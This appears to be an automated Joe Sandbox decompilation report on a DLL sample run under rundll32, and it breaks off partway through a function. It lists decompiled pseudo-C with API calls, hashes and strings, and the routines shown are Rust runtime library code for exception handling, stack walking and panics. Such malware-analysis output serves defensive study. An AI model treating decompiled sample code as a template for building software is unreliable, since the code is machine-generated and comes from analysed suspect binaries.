Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 3839614884-433696047
Opcode ID: 130868beb3e1cae89968022971cbdc0e8a63cac751531c8220564bfb329cfa05
Instruction ID: 9257e4851ca1cdeb3bb23c3499485f9ceafe313227e2bfc24fa191088d2d42c5
Opcode Fuzzy Hash: 130868beb3e1cae89968022971cbdc0e8a63cac751531c8220564bfb329cfa05
Instruction Fuzzy Hash: FCE1E1716087418FD705CFB8C4A076AB7E1EF86714F18896ED8958B3D5E334E8869B83

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDD1CC, Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6ECDD1CC(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6ECDD2E7(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6ECDE9D0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6ECDE9D0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6ECDD2E7(_t49);
				}
				return _t49;
			}

0x6ecdd1cc
0x6ecdd1cc
0x6ecdd1cc
0x6ecdd1e0
0x6ecdd1e2
0x6ecdd1e5
0x6ecdd1e5
0x6ecdd1e9
0x6ecdd1ee
0x6ecdd206
0x6ecdd20c
0x6ecdd212
0x6ecdd218
0x6ecdd21e
0x6ecdd224
0x6ecdd22a
0x6ecdd231
0x6ecdd238
0x6ecdd23f
0x6ecdd246
0x6ecdd24d
0x6ecdd254
0x6ecdd255
0x6ecdd25e
0x6ecdd264
0x6ecdd267
0x6ecdd26d
0x6ecdd27c
0x6ecdd288
0x6ecdd293
0x6ecdd29a
0x6ecdd2a1
0x6ecdd2ac
0x6ecdd2b4
0x6ecdd2bd
0x6ecdd2bf
0x6ecdd2c2
0x6ecdd2c4
0x6ecdd2ce
0x6ecdd2d6
0x6ecdd2dc
0x00000000
0x6ecdd2e3
0x6ecdd2e6

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6ECDD1D8
IsDebuggerPresent.KERNEL32 ref: 6ECDD2A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ECDD2C4
UnhandledExceptionFilter.KERNEL32(?), ref: 6ECDD2CE

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ce23f849d44760825a2633185758ac8893e2a3165bffc9ecb90bc32d57822b02
Instruction ID: ba1b7dbfebf2585b4c3980a50dc32d8b1058133420c6af22cb77167a7b465de1
Opcode Fuzzy Hash: ce23f849d44760825a2633185758ac8893e2a3165bffc9ecb90bc32d57822b02
Instruction Fuzzy Hash: 92311675D052199FDF50DFA4C989BCCBBB8AF08304F1041AAE50DAB240EB759A89CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCDD30, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ECCDD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6ECD39E0;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6ECDE9D0(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6ed0f8cc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6ECE9A30(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6ECE9470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ed106e0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6ECD0D10(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6ed1e128, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6ed1e128, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6ed1e128, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6ed0fdd8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed0f570;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6ECC2150( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6ed1e128, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ed0fde0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6ECDE9D0(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6ECDC5AE();
						_t217 = E6ECCE4E0(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6ed1e148; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6ed1e130, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6ECE94E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed10ad0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6ed1e148 = _t218;
									_t267 =  *0x6ed1e14c; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6ed1e14c; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6ed1e158; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6ECDE9D0(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6ECCE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6ed1e130, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6ECDE9D0(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6ed1e144; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6ed1e130, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6ECE94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed10ad0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6ed1e144 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6ECCE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6ed1e158 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6ed1e130, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6ECE94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed10ad0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6ECCE6D0( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6ed1e14c = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6ed1e128, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6ed0fe4c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed0f570;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6ECC2150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}

APIs

SetLastError.KERNEL32(00000000), ref: 6ECCDE42
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6ECCDE4A
GetLastError.KERNEL32 ref: 6ECCDE56
GetLastError.KERNEL32 ref: 6ECCDE68
GetLastError.KERNEL32 ref: 6ECCDECC
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCDEFD
HeapFree.KERNEL32(00000000,?), ref: 6ECCDF47
HeapFree.KERNEL32(00000000,?), ref: 6ECCDF58
GetCurrentProcess.KERNEL32(?), ref: 6ECCE031
GetCurrentThread.KERNEL32 ref: 6ECCE039
RtlCaptureContext.KERNEL32(?), ref: 6ECCE059
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6ECCE09A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6ECCE0C4
GetCurrentProcess.KERNEL32 ref: 6ECCE0D9
GetProcAddress.KERNEL32(StackWalkEx), ref: 6ECCE0FB
ReleaseMutex.KERNEL32(?), ref: 6ECCE1E8
HeapFree.KERNEL32(00000000,?), ref: 6ECCE26B
HeapFree.KERNEL32(00000000,?,?), ref: 6ECCE29D
GetProcAddress.KERNEL32(StackWalk64), ref: 6ECCE345

Strings

SymGetModuleBase64, xrefs: 6ECCE0B9
StackWalk64, xrefs: 6ECCE33A
StackWalkEx, xrefs: 6ECCE0F0
called `Option::unwrap()` on a `None` value, xrefs: 6ECCE3CC, 6ECCE3EF, 6ECCE412
SymFunctionTableAccess64, xrefs: 6ECCE08F

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
Opcode ID: 47293bbf609193f17e372cc2682563cd077d67c4c60e9ffe8c01fa088e2682f7
Instruction ID: 59ca00644ff7b29a874786afd50b1211f17e3d5440a6328dcb9df1749f708e44
Opcode Fuzzy Hash: 47293bbf609193f17e372cc2682563cd077d67c4c60e9ffe8c01fa088e2682f7
Instruction Fuzzy Hash: DB124AB0500B009FE761CFA5C895B93BBF4BB4A708F10491DE9AA87B91E771B449CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC700, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6ECCC700(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6ECD39A0;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6ed1e120], esi");
				_t190 = E6ECCD000(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6ECE95A0(_t264,  &M6ED0F8F7, 0x46, _t337,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed0f570;
						_v120 = 0x6ed0f824;
						_v68 = 0x6ed10260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECC2470;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6ECCD0F0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6ed1e128, 0, _t256);
							}
							_t194 = HeapFree( *0x6ed1e128, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ed10224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed0f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6ECCD0F0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6ed1e11c);
					_v144 = 0x6ed1e11c;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6ECCD000(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6ed1e110; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6ECCD380(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6ECE95A0(_t264,  &M6ED0F8F7, 0x46, _t340,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6ed1d044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6ed1d044;
							_t202 = E6ECD2960(_t264, 0x6ed1d044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6ed1d044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6ed1d044;
								_t203 = E6ECD2960(_t264, 0x6ed1d044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6ed1e128; // 0xc40000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6ed1d044;
										_t332 = _t205;
										_t206 =  *0x6ed1d044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6ECD2960(_t264, 0x6ed1d044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6ECE92F0(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
